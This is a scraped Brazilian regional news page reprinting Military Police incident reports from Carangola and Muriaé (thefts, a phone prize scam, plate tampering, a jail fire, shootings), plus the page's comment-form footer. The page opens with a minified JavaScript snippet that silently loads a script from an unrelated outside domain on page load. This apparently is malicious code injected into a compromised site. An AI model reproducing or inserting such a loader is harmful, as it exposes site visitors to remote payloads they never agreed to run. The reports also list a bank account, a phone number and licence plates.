;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Policia Militar - Ocorrências de Destaque Muriaé - 02/09/2013 - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Policia Militar – Ocorrências de Destaque Muriaé – 02/09/2013

pmbn

75ª Cia  Esp PM – CARANGOLA

FURTO CONSUMADO DE MOTOCICLETA EM FERVEDOURO-MG.
Em 01/09/2013, às 02h15min, na Rua NILO ALVES MONTEIRO, a vítima após sair da 9ª festa do café foi até o local onde havia estacionado sua motocicleta YAMAHA YBR 125K, vermelha, placa HAP-7895 FERVEDOURO, ANO 2006, quando viu dois indivíduos saindo no veículo sentido a BR 116. As características do autor que conduzia a moto era negro, usava blusa de moletom azul e capacete vermelho e o que estava na garupa, usava capacete preto. Os dois capacetes eram da vítima e estavam trancados na motocicleta.

ESTELIONATO EM CARANGOLA-MG.
Em 30/08/2013, às 08h55min, na Rua PEDRO DE OLIVEIRA, CENTRO, a vítima recebeu ligações telefônica do número (086)81507443 com o aviso de que havia sido premiada em uma promoção da vivo, cujos os prêmios seriam 45 mil reais em dinheiro e um carro zero quilômetro. Porém, para a vítima receber teria que realizar uma transferência em dinheiro. A vítima dirigiu-se à Agência do BANCO ITAÚ e, com orientações do estelionatário via celular, fez a transferência de R$999,89 para a conta bancária de número 4442.23420-1, em nome de LEVI CARDOSO. O estelionatário ainda solicitou a vítima fazer outro valor na CEF, contudo não foi feito. Foi registrado o boletim de ocorrência e a vítima orientada quanto as demais providências.

ADULTERAÇÃO DE VEÍCULO EM CARANGOLA-MG.
Em 31/08/2013, às 21h53min, na Rua MAGALHÃES DE QUEIROZ, policiais militares abordaram o suspeito de 18 anos conduzindo uma moto HONDA CG de cor azul, com a placa GQA-9039, município de ITAOCARA/RJ, sem possuir habilitação. A placa utilizada no veículo pertencia a outro veículo, e o chassi também não conferia. O autor disse que colocou aquela placa, pois temia ser abordado pela Polícia. Segundo ele adquiriu o veículo de um cidadão que reside na VILA DO CAFARNAUM, município de FARIA LEMOS, que por sua vez teria adquirido a moto de leilão. O autor foi preso e encaminhado a Delegacia de Plantão. O veículo removido ao pátio.

DANO A CADEIA PÚBLICA EM CARANGOLA-MG.

Em 01/09/2013, às 15h40min, na Cadeia Pública, situada na LADEIRA CARLOS GOMES, CAIXA D’AGUA, o adolescente de 17 anos, preso provisório, ateou fogo no colchão da cela que se encontrava. Os militares depararam com adolescente tentando apagá-lo, porém sem êxito, sendo necessário abrir cela para apagar o fogo. O infrator foi conduzido ao pronto atendimento médico onde o médico constatou perigo de vida devido à inalação de monóxido de carbono e partícula sólida, sendo após, conduzido a Cadeia Local. O fogo danificou o colchão e a pintura das paredes da cela. O adolescente encontra-se provisoriamente detido, por ter sido preso dia 28/08/2013, com crack e 01 arma de fogo.

  76ª CIA PM – MURIAÉ

FURTO CONSUMADO DE MOTOCICLETA EM MURIAE-MG.

Em 30/08/2013, 09h14 min, compareceu na (UAI),UNIDADE DE ATENDIMENTO INTEGRADO  o solicitante, relatou que deixou sua motocicleta HONDA / CG 125 TITAN KS , placa GZR-1151, cor vermelha, estacionada na via publica durante a noite e ao acordar nesta manha  constatou que sua moto foi furtada. A motocicleta não tem dispositivo de alarme anti furto e estava trancada na tranca especifica do guidom. O veiculo estava abastecido com aproximadamente quatro litros de gasolina e no para lamas traseiro tem um adesivo escrito GP MOTOS. Rastreamento sem êxito.

 VEÍCULO LOCALIZADO / RECUPERADO EM MURIAÉ-MG.

Em 30/08/2013 às 10h49min, na RUA RAPHAEL F. FERNANDES, bairro BOM PASTOR, militares receberam informações dando conta de que o infrator de 17 anos, estaria de posse de um veículo marca/modelo HONDA/CG 125 FAN de cor preta, placa KAS-0793, produto de furto. Ao chegarem pelo local, os militares localizaram a referida motocicleta estacionada em uma varanda nos fundos da residência do suspeito. Após consulta no sistema informatizado, foi constatado a veracidade da denúncia. O infrator relatou ter comprado o veículo por um valor de R$ 1.000,00 reais de um indivíduo, sendo o veículo recolhido ao PATIO.

DISPARO DE ARMA DE FOGO EM MURIAÉ-MG.

Em 31/09/2013, à 20h20min, na RUA NARCÍSIO DIAS RABELO, BAIRRO UNIÃO, MURIAÉ, militares receberam denúncias que no referido bairro, os autores já conhecidos no meio policial estariam efetuando disparos de arma de fogo e que após os disparos os autores teriam evadido sentido ao bairro GASPAR. Militares efetuaram intenso rastreamento e incursões, contudo sem êxito e ninguém apresentou-se como vítima dos disparos.

LESÃO CORPORAL POR DISPARO DE ARMA DE FOGO EM MURIAÉ-MG.

Em 01/09/2013, à 06h54min, na AV. JOSÉ RESENDE FONTES, BAIRRO BOA VISTA, MURIAÉ, militares depararam com a vítima de 46 anos, caída ao solo em frente à Boate Four, lesionada por disparo de arma de fogo. Segundo testemunhas a vítima e sua amiga de 45 anos, brigaram no interior da boate, contra um casal, sendo o autor reconhecido como sendo um promotor de eventos na cidade, e que o casal agrediu a vítima com chutes e socos, e que a mesma saiu atrás do casal, que já estava indo embora, para tirar satisfações, e o autor e sua companheira  teriam entrado em um veiculo, tendo o autor apoderado de uma arma e atirou contra a vítima, vindo logo apos a evadir no veiculo, tomando rumo ignorado. A direção da boate ficou de localizar os dados do registro de entrada do autor no sistema, e que este seria branco, olhos verdes, magro de estatura mediana, conhecido por promover shows na cidade. E também não foi repassado informações da acompanhante do autor ficando apenas as conseguidas nas fontes abertas. No local foi encontrado um projetil próximo onde a vítima estava caída, sendo o mesmo recolhido a pedido do perito, que relatou não haver necessidade de comparecer ao local. As vitimas foram socorridas ao HSP. As vitimas não souberam repassar nenhuma informação sobre e ocorrido, e foram orientadas quanto as demais providencias.

ASSESSORIA DE COMUNICAÇÃO DO 47° BPM – MURIAÉ / MG

RUA JOSÉ DE FREITAS LIMA Nº47 – BAIRRO SAFIRA

MURIAÉ / MG

TELEFONE: 3696-3265.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.